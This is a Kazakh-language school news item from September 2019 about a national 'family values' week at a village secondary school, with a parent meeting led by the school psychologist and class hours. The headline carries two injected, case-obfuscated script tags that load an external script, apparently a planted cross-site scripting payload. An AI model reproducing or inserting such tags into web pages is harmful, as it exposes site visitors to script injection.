«Отбасы – бақыт мекені» республикалық апталығы<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>

16.09.2019

   Ғ.Әбдірахманұлы атындағы Қима орта мектебінде 6-14 қыркүйек аралығында «Отбасы – бақыт мекені» республикалық апталық өткізілді. Мақсаты – қоғамда отбасылық құндылықтарды насихаттау, отбасы мен балалар мүддесіне мемлекеттік құрылымдардың, қоғамдық, үкіметтік емесұйымдардың, бизнес топтардың, БАҚ-тың күштерін біріктіру.

     Апталық аясында 1-сынып атат-аналарына мектеп психологы Тапаева А.К. кездесу өткізіп, «Баланы сәттілікке жетелеу жолында ата-ананың рөлі» тақырыбы төңірегінде жұмыс жасалды. Ата-аналармен тренинг жүргізіліп, бала тәрбиелеу жолында қандай мәселелерге назар аудару керектігі жайлы ақпарат берілді.  Сондай-ақ, сынып жетекшілері Макишева Құралай Дабыловна мен Толеуова Айнагуль Алдабергеновна, ата-аналарға пайдалы кеңестер беріп, іс-шараға қорытынды жасады.

      Сондай-ақ, 1-11 сыныптар арасында сынып сағаттары өткізілді.

Омарова А.Б.

Просмотров: 768


Пікір қосу



Деректерді қолтаңбаға қосу